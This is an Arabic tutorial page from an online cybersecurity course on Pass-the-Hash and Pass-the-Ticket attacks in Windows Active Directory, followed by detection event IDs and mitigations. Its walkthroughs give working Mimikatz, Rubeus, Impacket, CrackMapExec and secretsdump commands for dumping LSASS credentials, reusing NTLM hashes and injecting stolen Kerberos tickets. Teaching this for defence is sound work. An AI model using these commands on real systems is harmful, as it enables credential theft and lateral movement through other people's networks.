Cyber Security Academy · درس

هجمات Pass-the-Hash وPass-the-Ticket

استخدم تجزئات بيانات الاعتماد وتذاكر Kerberos للتحرك جانبيًا دون معرفة كلمات المرور بنصها الصريح.

الدرس 2 من 413 خطوة

هجمات Pass-the-Hash وPass-the-Ticket درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 2 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

سبب وجود هذه الهجمات

تخزّن بروتوكولات بيانات اعتماد Windows أسرار المصادقة (تجزئات NTLM وتذاكر Kerberos) في الذاكرة. يستطيع المهاجم الذي يملك امتيازات SYSTEM استخراج هذه الأسرار وإعادة استخدامها للمصادقة بهوية مستخدمين آخرين دون معرفة كلمات المرور.

استخراج تجزئات NTLM باستخدام Mimikatz

تُعد Mimikatz الأداة الأبرز لاستخراج بيانات الاعتماد في Windows. وعند تشغيلها بامتيازات SYSTEM أو Administrator، تقرأ ذاكرة عملية LSASS لاستخراج تجزئات NTLM وبيانات الاعتماد ذات النص الصريح.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

تمرير التجزئة (PtH) باستخدام Mimikatz

يحقن PtH تجزئة NTLM في جلسة جديدة دون معرفة كلمة المرور النصية الصريحة. وتُستخدم التجزئة للمصادقة على الخدمات البعيدة عبر NTLM — مما يجعلها فعالة للحركة الجانبية إلى مضيفي Windows الآخرين.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

تمرير التجزئة باستخدام Impacket

توفر Impacket أدوات Python لتنفيذ PtH: إذ تقبل psexec.py وsmbexec.py وwmiexec.py تجزئات NTLM مباشرة لتنفيذ الأوامر عن بُعد.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

استخراج تذاكر Kerberos

تُخزّن تذاكر Kerberos أيضًا في ذاكرة LSASS. تستخرجها Mimikatz، بينما تُعد Rubeus الأداة المتخصصة في عمليات تذاكر Kerberos على Windows.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

تمرير التذكرة (PtT)

يحقن PtT تذكرة Kerberos مسروقة في الجلسة الحالية. وتُستخدم التذكرة للمصادقة على الخدمات بهوية مالكها الأصلي — دون الحاجة إلى تجزئة أو كلمة مرور.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

تفريغ LSASS عن بُعد

من نقطة ارتكاز، أفرغ LSASS عن بُعد باستخدام CrackMapExec أو secretsdump من Impacket — دون الحاجة إلى جلسة تفاعلية على الهدف.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

مسارات الحركة الجانبية

بعد الحصول على التجزئات أو التذاكر، تحرّك جانبيًا: استخدم PtH على الأجهزة الأخرى مع إعادة استخدام حسابات المسؤول المحلي، واستخدم PtT للوصول إلى خدمات النطاق، ثم صعّد الامتيازات باتجاه مسؤول النطاق باستهداف الحسابات ذات الامتيازات.

اكتشاف PtH وPtT

يكتشف المدافعون PtH من خلال: Event ID 4624 (تسجيل الدخول) مع نوع تسجيل دخول 3 وعدم وجود تسجيل دخول تفاعلي مطابق، وشذوذات مصادقة NTLM، وبصمات Mimikatz في الذاكرة أو على القرص.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

إجراءات التخفيف

تشمل إجراءات التخفيف الأساسية: تفعيل Credential Guard (الذي يحمي LSASS باستخدام المحاكاة الافتراضية)، وتقييد إعادة استخدام حساب المسؤول المحلي بين الأجهزة (LAPS)، وفرض مجموعة Protected Users على الحسابات ذات الامتيازات، وتعطيل NTLM حيثما أمكن.

Overpass-the-Hash

يحوّل Overpass-the-Hash تجزئة NTLM إلى TGT خاص بـ Kerberos. ويفيد ذلك في البيئات التي حُظر فيها NTLM مع توفر Kerberos، أو عند الحاجة إلى TGT لتنفيذ المزيد من هجمات Kerberos.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

تحقق سريع

ما ميزة أمان Windows التي تحمي تخزين بيانات اعتماد LSASS باستخدام المحاكاة الافتراضية؟

ملخص: PtH وPtT

يمثل تمرير التجزئة وتمرير التذكرة أساس الحركة الجانبية في Active Directory. إذ يستغل كلاهما التخزين المؤقت لبيانات اعتماد Windows في LSASS. وتجعل Mimikatz وImpacket استخراجها وإعادة استخدامها أمرًا سهلًا للغاية. احمِ البيئة باستخدام Credential Guard وLAPS ومجموعة Protected Users، مع المراقبة الصارمة لأحداث مصادقة NTLM وKerberos.

البدء مجانًا

تعلم Cyber Security Academy مع معلم ذكاء اصطناعي — مجانًا

اكتب وقم بتشغيل أكوادك الفعلية في المتصفح، واحصل على مساعدة فورية من معلم ذكاء اصطناعي متاح 24/7، واستمر من حيث توقفت على الويب أو في التطبيق.

الدورات
76
الدروس
303

الأسئلة الشائعة

هل درس «هجمات Pass-the-Hash وPass-the-Ticket» مجاني؟

نعم — نص درس «هجمات Pass-the-Hash وPass-the-Ticket» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

ماذا ستتعلم في «هجمات Pass-the-Hash وPass-the-Ticket»؟

استخدم تجزئات بيانات الاعتماد وتذاكر Kerberos للتحرك جانبيًا دون معرفة كلمات المرور بنصها الصريح. تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.

هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟

لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 2 من أصل 4.

كم من الوقت يستغرق درس «هجمات Pass-the-Hash وPass-the-Ticket»؟

معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.

هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟

نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.

جميع الدروس في هذه الدورة

  1. مصادقة Windows: NTLM وKerberos
  2. هجمات Pass-the-Hash وPass-the-Ticket
  3. Kerberoasting وAS-REP Roasting
  4. تحصين Active Directory
← العودة إلى Cyber Security Academy